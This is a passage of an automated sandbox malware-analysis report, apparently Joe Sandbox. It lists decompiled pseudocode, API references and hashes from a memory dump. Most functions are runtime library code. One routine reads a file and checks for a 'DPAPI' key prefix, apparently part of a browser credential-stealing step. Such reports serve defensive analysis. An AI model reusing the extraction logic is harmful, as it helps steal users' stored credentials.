                                                                    • __EH_prolog3.LIBCMT ref: 0040DF60
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DF6D
                                                                    • std::exception::exception.LIBCMT ref: 0040DFA4
                                                                      • Part of subcall function 0041DC00: std::exception::_Copy_str.LIBCMT ref: 0041DC1B
                                                                    • __CxxThrowException@8.LIBCMT ref: 0040DFB9
                                                                      • Part of subcall function 0041FF86: RaiseException.KERNEL32(?,0040475E,^G@,?,?,?,?,?,0040475E,?,00440C30,00000000), ref: 0041FFC8
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Copy_strExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                    • String ID: bad locale name
                                                                    • API String ID: 637683493-1405518554
                                                                    • Opcode ID: 7a5a08fb16d21dcd184fecacbc8da4d703c0c31949af8d834804a91b9b555785
                                                                    • Instruction ID: 927391ea07966b8c64ce088660c451b2e0fcc7dfa6d47af2e1abd5d2742791d2
                                                                    • Opcode Fuzzy Hash: 7a5a08fb16d21dcd184fecacbc8da4d703c0c31949af8d834804a91b9b555785
                                                                    • Instruction Fuzzy Hash: 8501B1B1900704DECB20EF9A80814CEBBE0BF18314F80C51FE19957241C738A649CB9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042C5D9 Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E0042C5D9(void* __ecx, void* __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t33;
				int _t37;
				void* _t40;
				short* _t41;
				short* _t47;
				void* _t48;
				void* _t54;
				int _t56;
				void* _t57;
				void* _t60;
				signed int _t61;
				short* _t62;

				_t54 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t27 =  *0x443674; // 0x393162b1
				_v8 = _t27 ^ _t61;
				_t47 = 0;
				_v12 = 0;
				if(_a24 == 0) {
					_a24 =  *((intOrPtr*)( *_a4 + 4));
				}
				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
				if(_t56 != _t47) {
					if(__eflags > 0) {
						__eflags = _t56 - 0x7ffffff0;
						if(_t56 <= 0x7ffffff0) {
							_t16 = _t56 + 8; // 0x8
							_t40 = _t56 + _t16;
							__eflags = _t40 - 0x400;
							if(_t40 > 0x400) {
								_t41 = E0041DAE4(_t54, _t56, MultiByteToWideChar, _t40);
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xdddd;
									goto L11;
								}
							} else {
								E0042D000(_t40);
								_t41 = _t62;
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xcccc;
									L11:
									_t41 =  &(_t41[4]);
									__eflags = _t41;
								}
							}
							_t47 = _t41;
						}
					}
					__eflags = _t47;
					if(_t47 == 0) {
						goto L3;
					} else {
						E00426300(_t47, 0, _t56 + _t56);
						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
						__eflags = _t37;
						if(_t37 != 0) {
							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
						}
						E004217EE(_t47);
						_t33 = _v12;
					}
				} else {
					L3:
					_t33 = 0;
				}
				_pop(_t57);
				_pop(_t60);
				_pop(_t48);
				return E0041DA9B(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
			}






















                                                                    0x0042c5d9
                                                                    0x0042c5de
                                                                    0x0042c5df
                                                                    0x0042c5e0
                                                                    0x0042c5e7
                                                                    0x0042c5eb
                                                                    0x0042c5ef
                                                                    0x0042c5f5
                                                                    0x0042c5ff
                                                                    0x0042c5ff
                                                                    0x0042c625
                                                                    0x0042c629
                                                                    0x0042c62f
                                                                    0x0042c631
                                                                    0x0042c637
                                                                    0x0042c639
                                                                    0x0042c639
                                                                    0x0042c63d
                                                                    0x0042c642
                                                                    0x0042c658
                                                                    0x0042c65e
                                                                    0x0042c660
                                                                    0x0042c662
                                                                    0x00000000
                                                                    0x0042c662
                                                                    0x0042c644
                                                                    0x0042c644
                                                                    0x0042c649
                                                                    0x0042c64b
                                                                    0x0042c64d
                                                                    0x0042c64f
                                                                    0x0042c668
                                                                    0x0042c668
                                                                    0x0042c668
                                                                    0x0042c668
                                                                    0x0042c64d
                                                                    0x0042c66b
                                                                    0x0042c66b
                                                                    0x0042c637
                                                                    0x0042c66d
                                                                    0x0042c66f
                                                                    0x00000000
                                                                    0x0042c671
                                                                    0x0042c678
                                                                    0x0042c68d
                                                                    0x0042c68f
                                                                    0x0042c691
                                                                    0x0042c6a1
                                                                    0x0042c6a1
                                                                    0x0042c6a5
                                                                    0x0042c6aa
                                                                    0x0042c6ad
                                                                    0x0042c62b
                                                                    0x0042c62b
                                                                    0x0042c62b
                                                                    0x0042c62b
                                                                    0x0042c6b1
                                                                    0x0042c6b2
                                                                    0x0042c6b3
                                                                    0x0042c6bf

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,0000009C,00000000,00000000,00000003,00000001,00000000,?,?,?,0042C6EE,?,00000001,?), ref: 0042C623
                                                                    • _malloc.LIBCMT ref: 0042C658
                                                                    • _memset.LIBCMT ref: 0042C678
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,0000009C,?,00000001,0000009C,?,00000008,00420E8A,0000009C), ref: 0042C68D
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0042C69B
                                                                    • __freea.LIBCMT ref: 0042C6A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                    • String ID:
                                                                    • API String ID: 525495869-0
                                                                    • Opcode ID: 4ace32313dd5e7e433bf2ca4e1ff2a8991a20de20919aba7a71fa066dd06267e
                                                                    • Instruction ID: f36e6f9a826ddab8d2244165479cc84c1ad4f24476773474cd718a627f3fb3b8
                                                                    • Opcode Fuzzy Hash: 4ace32313dd5e7e433bf2ca4e1ff2a8991a20de20919aba7a71fa066dd06267e
                                                                    • Instruction Fuzzy Hash: 9831BFB160021AAFDF109F65ECC0DAF7BA9EF48358FA1002AF900D6250D738DD609B68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E4EC Relevance: 9.1, APIs: 6, Instructions: 56filememoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 66%
                                                                    			E0040E4EC(void** __ebx, long* __esi, CHAR* _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				void* _t12;
				long _t16;
				void* _t17;
				signed int _t26;

				_t26 = 0;
				_t12 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v8 = _t12;
				if(_t12 == 0 || _t12 == 0xffffffff) {
					L8:
					return _t26;
				} else {
					_push( &_v20);
					_push(_t12);
					if( *0x446274() != 0 && _v16 == 0) {
						_t16 = _v20;
						 *__esi = _t16;
						_t17 = LocalAlloc(0x40, _t16);
						 *__ebx = _t17;
						if(_t17 != 0) {
							_t26 = ReadFile(_v8, _t17,  *__esi,  &_v12, 0) & (0 |  *__esi == _v12);
							if(_t26 == 0) {
								LocalFree( *__ebx);
							}
						}
					}
					CloseHandle(_v8);
					goto L8;
				}
			}











                                                                    0x0040e4f3
                                                                    0x0040e504
                                                                    0x0040e50a
                                                                    0x0040e50f
                                                                    0x0040e570
                                                                    0x0040e574
                                                                    0x0040e516
                                                                    0x0040e519
                                                                    0x0040e51a
                                                                    0x0040e523
                                                                    0x0040e52a
                                                                    0x0040e530
                                                                    0x0040e532
                                                                    0x0040e538
                                                                    0x0040e53c
                                                                    0x0040e55b
                                                                    0x0040e55d
                                                                    0x0040e561
                                                                    0x0040e561
                                                                    0x0040e55d
                                                                    0x0040e53c
                                                                    0x0040e56a
                                                                    0x00000000
                                                                    0x0040e56a

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040E504
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040E51B
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040E532
                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040E549
                                                                    • LocalFree.KERNEL32(?), ref: 0040E561
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E56A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 2311089104-0
                                                                    • Opcode ID: 7247d1b5bb5cfd02aa79d9b2fa6f1df1a995ea4f9b0188ffecb1e9f70fa1f7eb
                                                                    • Instruction ID: 7b4f10b5a38ff8e641d19d576ff9e09ba3d749393a97271b12f4454e8eb44898
                                                                    • Opcode Fuzzy Hash: 7247d1b5bb5cfd02aa79d9b2fa6f1df1a995ea4f9b0188ffecb1e9f70fa1f7eb
                                                                    • Instruction Fuzzy Hash: F9117C75600200FBDF209FB5DC48E6E7BB9FB8A744F240D6AF941E3290E6718910CB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004224E4 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E004224E4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x4407d8);
				E00427300(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E004206D0(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00425F05(__ecx, __edx, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00425F05(_t48, __edx, _t61) + 0x8c));
				 *((intOrPtr*)(E00425F05(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00425F05(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00420775(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0042260A(_t48, _t53, _t55, _t57, _t61);
				return E00427345( *((intOrPtr*)(_t58 - 0x1c)));
			}







                                                                    0x004224e4
                                                                    0x004224e4
                                                                    0x004224e4
                                                                    0x004224e6
                                                                    0x004224eb
                                                                    0x004224f0
                                                                    0x004224f2
                                                                    0x004224f5
                                                                    0x004224f8
                                                                    0x004224fb
                                                                    0x00422502
                                                                    0x00422513
                                                                    0x00422521
                                                                    0x0042252f
                                                                    0x00422537
                                                                    0x00422545
                                                                    0x0042254b
                                                                    0x00422552
                                                                    0x00422555
                                                                    0x0042256b
                                                                    0x0042256e
                                                                    0x004225e3
                                                                    0x004225ea
                                                                    0x004225f1
                                                                    0x004225fe

                                                                    APIs
                                                                    • __CreateFrameInfo.LIBCMT ref: 0042250C
                                                                      • Part of subcall function 004206D0: __getptd.LIBCMT ref: 004206DE
                                                                      • Part of subcall function 004206D0: __getptd.LIBCMT ref: 004206EC
                                                                    • __getptd.LIBCMT ref: 00422516
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __getptd.LIBCMT ref: 00422524
                                                                    • __getptd.LIBCMT ref: 00422532
                                                                    • __getptd.LIBCMT ref: 0042253D
                                                                    • _CallCatchBlock2.LIBCMT ref: 00422563
                                                                      • Part of subcall function 00420775: __CallSettingFrame@12.LIBCMT ref: 004207C1
                                                                      • Part of subcall function 0042260A: __getptd.LIBCMT ref: 00422619
                                                                      • Part of subcall function 0042260A: __getptd.LIBCMT ref: 00422627
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1602911419-0
                                                                    • Opcode ID: f5005e2ffcda21b7cecb452a601bea4a91e670ddee601b9586aea6045a3b2e2c
                                                                    • Instruction ID: 6d6fe0760df3cffe7d8d86b6eb2ab28763e7854ebedc45a92d9a04fb03ec2ece
                                                                    • Opcode Fuzzy Hash: f5005e2ffcda21b7cecb452a601bea4a91e670ddee601b9586aea6045a3b2e2c
                                                                    • Instruction Fuzzy Hash: 201137B1E00219EFDB00EFA5D545BAD7BB0FF04314F51806AF814A7251DB789A119F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042555B Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 81%
                                                                    			E0042555B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x4408b8);
				E00427300(__ebx, __edi, __esi);
				_t31 = E00425F05(__ebx, __edx, _t35);
				_t15 =  *0x443bb0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004279D9(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x443ab8; // 0x4be1620
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x443690;
								if(__eflags != 0) {
									E0041DAAA(_t33);
								}
							}
						}
						_t21 =  *0x443ab8; // 0x4be1620
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x443ab8; // 0x4be1620
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004255F6();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E004233A7(_t29, _t38);
				}
				return E00427345(_t33);
			}









                                                                    0x0042555b
                                                                    0x0042555b
                                                                    0x0042555b
                                                                    0x0042555b
                                                                    0x0042555d
                                                                    0x00425562
                                                                    0x0042556c
                                                                    0x0042556e
                                                                    0x00425576
                                                                    0x00425597
                                                                    0x0042559d
                                                                    0x004255a1
                                                                    0x004255a4
                                                                    0x004255a7
                                                                    0x004255ad
                                                                    0x004255af
                                                                    0x004255b1
                                                                    0x004255ba
                                                                    0x004255bc
                                                                    0x004255be
                                                                    0x004255c4
                                                                    0x004255c7
                                                                    0x004255cc
                                                                    0x004255c4
                                                                    0x004255bc
                                                                    0x004255cd
                                                                    0x004255d2
                                                                    0x004255d5
                                                                    0x004255db
                                                                    0x004255df
                                                                    0x004255df
                                                                    0x004255e5
                                                                    0x004255ec
                                                                    0x0042557e
                                                                    0x0042557e
                                                                    0x0042557e
                                                                    0x00425581
                                                                    0x00425583
                                                                    0x00425585
                                                                    0x00425587
                                                                    0x0042558c
                                                                    0x00425594

                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00425567
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __amsg_exit.LIBCMT ref: 00425587
                                                                    • __lock.LIBCMT ref: 00425597
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004255B4
                                                                    • _free.LIBCMT ref: 004255C7
                                                                    • InterlockedIncrement.KERNEL32(04BE1620), ref: 004255DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    • Opcode ID: 8bc48339bfb7cd7029fc357b63bf3c10493c26a84983adb850f7b4affa2b066e
                                                                    • Instruction ID: c885bef346d1ca856128c8a158b1ec3707670cd5ecf1be1575e9340df842787f
                                                                    • Opcode Fuzzy Hash: 8bc48339bfb7cd7029fc357b63bf3c10493c26a84983adb850f7b4affa2b066e
                                                                    • Instruction Fuzzy Hash: A7015E31B01A31BBD611AF69A40575E73B1AF04B25F85405BE800A7684CB3C5AC1DBDD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DFD3 Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E0040DFD3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				void* _t40;

				_push(0);
				E004207D5(E004337BA, __ebx, __edi, __esi);
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *(_t40 - 4) = 4;
				E0041D371(_t39);
				_t20 =  *(_t39 + 0x1c);
				if( *(_t39 + 0x1c) != 0) {
					E0041DAAA(_t20);
				}
				 *(_t39 + 0x1c) =  *(_t39 + 0x1c) & 0x00000000;
				_t21 =  *(_t39 + 0x14);
				if( *(_t39 + 0x14) != 0) {
					E0041DAAA(_t21);
				}
				 *(_t39 + 0x14) =  *(_t39 + 0x14) & 0x00000000;
				_t22 =  *(_t39 + 0xc);
				if( *(_t39 + 0xc) != 0) {
					E0041DAAA(_t22);
				}
				 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0x00000000;
				_t23 =  *(_t39 + 4);
				if( *(_t39 + 4) != 0) {
					E0041DAAA(_t23);
				}
				 *(_t39 + 4) =  *(_t39 + 4) & 0x00000000;
				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
				return E00420874(E0041D5E5(_t39));
			}





                                                                    0x0040dfd3
                                                                    0x0040dfda
                                                                    0x0040dfdf
                                                                    0x0040dfe3
                                                                    0x0040dfea
                                                                    0x0040dfef
                                                                    0x0040dff5
                                                                    0x0040dff8
                                                                    0x0040dffd
                                                                    0x0040dffe
                                                                    0x0040e002
                                                                    0x0040e007
                                                                    0x0040e00a
                                                                    0x0040e00f
                                                                    0x0040e010
                                                                    0x0040e014
                                                                    0x0040e019
                                                                    0x0040e01c
                                                                    0x0040e021
                                                                    0x0040e022
                                                                    0x0040e026
                                                                    0x0040e02b
                                                                    0x0040e02e
                                                                    0x0040e033
                                                                    0x0040e034
                                                                    0x0040e038
                                                                    0x0040e048

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0040DFDA
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040DFEA
                                                                      • Part of subcall function 0041D371: _setlocale.LIBCMT ref: 0041D383
                                                                    • _free.LIBCMT ref: 0040DFF8
                                                                      • Part of subcall function 0041DAAA: HeapFree.KERNEL32(00000000,00000000,?,00425EF6,00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 0041DAC0
                                                                      • Part of subcall function 0041DAAA: GetLastError.KERNEL32(00000000,?,00425EF6,00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 0041DAD2
                                                                    • _free.LIBCMT ref: 0040E00A
                                                                    • _free.LIBCMT ref: 0040E01C
                                                                    • _free.LIBCMT ref: 0040E02E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeH_prolog3HeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                    • String ID:
                                                                    • API String ID: 2259855018-0
                                                                    • Opcode ID: c85278e03b82dba36a8c92036201ba3f54cf36dd9148fd13df6fb523c31be93c
                                                                    • Instruction ID: 38989e7501c4d082ed712021821017c047507b9dd593b31c9c1ff3e729b20df6
                                                                    • Opcode Fuzzy Hash: c85278e03b82dba36a8c92036201ba3f54cf36dd9148fd13df6fb523c31be93c
                                                                    • Instruction Fuzzy Hash: F0018FB1B007019BD734FE62C41A79B73E8AF00768F008A1EE059DB5C1CB7CE9448A68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E6CB Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E0040E6CB(void* __ebx, intOrPtr __ecx, char* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t68;
				char* _t74;
				void* _t78;
				void* _t82;

				_t79 = __edi;
				_push(0x38);
				E0042083E(E00433AA8, __ebx, __edi, __esi);
				 *(_t82 - 0x38) =  *(_t82 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t82 - 0x40)) = __ecx;
				_t81 = _t82 - 0x30;
				_t61 = _t82 - 0x34;
				 *((intOrPtr*)(_t82 - 0x44)) =  *((intOrPtr*)(_t82 + 0xc));
				if(E0040E4EC(_t82 - 0x34, _t82 - 0x30,  *((intOrPtr*)(_t82 + 8))) == 0) {
					L19:
					return E00420888(_t61, _t79, _t81);
				}
				_t61 = 0;
				if( *((intOrPtr*)(_t82 - 0x34)) == 0) {
					goto L19;
				}
				_t81 =  *(_t82 - 0x30);
				if(_t81 == 0) {
					goto L19;
				}
				_t79 = LocalAlloc(0x40, _t81 + 1);
				if(_t79 == 0) {
					goto L19;
				}
				if(_t81 <= 0) {
					L7:
					if(StrStrA(_t79,  *0x445dac) == _t61) {
						goto L19;
					}
					_t65 = _t82 - 0x2c;
					 *((intOrPtr*)(_t82 - 0x18)) = 0xf;
					 *((intOrPtr*)(_t82 - 0x1c)) = _t61;
					 *((char*)(_t82 - 0x2c)) = _t61;
					E00404331(_t82 - 0x2c, _t45 + 0x1d);
					 *((intOrPtr*)(_t82 - 4)) = _t61;
					if(E0040C00F(_t82 - 0x2c, "\"}", _t61) != 0xffffffff) {
						_t65 = _t82 - 0x2c;
						E0040453E(_t82 - 0x2c, _t49, 0xffffffff);
					}
					_t50 =  *((intOrPtr*)(_t82 - 0x2c));
					if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
						_t50 = _t82 - 0x2c;
					}
					_t79 = _t82 - 0x3c;
					_t61 = _t82 - 0x30;
					if(E0040E575(_t82 - 0x30, _t65, _t82 - 0x3c, _t50) != 0) {
						_t75 =  *(_t82 - 0x3c);
						_t68 = 5;
						if( *(_t82 - 0x3c) >= _t68) {
							_t53 =  *(_t82 - 0x30);
							_t79 = 0x43d00c;
							_t81 =  *(_t82 - 0x30);
							_t61 = 0;
							asm("repe cmpsb");
							if(0 == 0) {
								_t79 = _t82 - 0x30;
								if(E0040E5CE(_t53 + 5, _t82 - 0x30, _t75 + 0xfffffffb, _t82 - 0x34) != 0 &&  *(_t82 - 0x30) == 0x20) {
									 *(_t82 - 0x38) = 1;
									E0040E661( *((intOrPtr*)(_t82 - 0x44)),  *((intOrPtr*)(_t82 - 0x40)),  *((intOrPtr*)(_t82 - 0x34)));
								}
							}
						}
					}
					E00404354(_t82 - 0x2c, 1, 0);
					goto L19;
				} else {
					_t74 = _t79;
					_t78 =  *((intOrPtr*)(_t82 - 0x34)) - _t79;
					do {
						 *_t74 =  *((intOrPtr*)(_t78 + _t74));
						_t74 =  &(_t74[1]);
						_t81 = _t81 - 1;
					} while (_t81 != 0);
					goto L7;
				}
			}








                                                                    0x0040e6cb
                                                                    0x0040e6cb
                                                                    0x0040e6d2
                                                                    0x0040e6da
                                                                    0x0040e6de
                                                                    0x0040e6e5
                                                                    0x0040e6e8
                                                                    0x0040e6eb
                                                                    0x0040e6f6
                                                                    0x0040e804
                                                                    0x0040e80c
                                                                    0x0040e80c
                                                                    0x0040e6fc
                                                                    0x0040e701
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e707
                                                                    0x0040e70c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e71e
                                                                    0x0040e722
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e72a
                                                                    0x0040e73c
                                                                    0x0040e74b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e755
                                                                    0x0040e758
                                                                    0x0040e75f
                                                                    0x0040e762
                                                                    0x0040e765
                                                                    0x0040e774
                                                                    0x0040e77f
                                                                    0x0040e784
                                                                    0x0040e787
                                                                    0x0040e787
                                                                    0x0040e790
                                                                    0x0040e793
                                                                    0x0040e795
                                                                    0x0040e795
                                                                    0x0040e799
                                                                    0x0040e79c
                                                                    0x0040e7a7
                                                                    0x0040e7a9
                                                                    0x0040e7ae
                                                                    0x0040e7b1
                                                                    0x0040e7b3
                                                                    0x0040e7b6
                                                                    0x0040e7bb
                                                                    0x0040e7bd
                                                                    0x0040e7bf
                                                                    0x0040e7c1
                                                                    0x0040e7ce
                                                                    0x0040e7da
                                                                    0x0040e7eb
                                                                    0x0040e7f2
                                                                    0x0040e7f7
                                                                    0x0040e7da
                                                                    0x0040e7c1
                                                                    0x0040e7b1
                                                                    0x0040e7ff
                                                                    0x00000000
                                                                    0x0040e72c
                                                                    0x0040e72f
                                                                    0x0040e731
                                                                    0x0040e733
                                                                    0x0040e736
                                                                    0x0040e738
                                                                    0x0040e739
                                                                    0x0040e739
                                                                    0x00000000
                                                                    0x0040e733

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040E6D2
                                                                      • Part of subcall function 0040E4EC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040E504
                                                                      • Part of subcall function 0040E4EC: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040E51B
                                                                      • Part of subcall function 0040E4EC: LocalAlloc.KERNEL32(00000040,?), ref: 0040E532
                                                                      • Part of subcall function 0040E4EC: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040E549
                                                                      • Part of subcall function 0040E4EC: LocalFree.KERNEL32(?), ref: 0040E561
                                                                      • Part of subcall function 0040E4EC: CloseHandle.KERNEL32(?), ref: 0040E56A
                                                                    • LocalAlloc.KERNEL32(00000040,?,00000038,004088FC,?,?,00000001,00000000,00000001), ref: 0040E718
                                                                    • StrStrA.SHLWAPI(00000000), ref: 0040E743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileLocal$Alloc$CloseCreateFreeH_prolog3_HandleReadSize
                                                                    • String ID: $DPAPI
                                                                    • API String ID: 2927704599-1819349886
                                                                    • Opcode ID: feb0dd7a4c08f04702d763bdba0a441384657e9fdaf4ccebeb5b21a9fe20b4f1
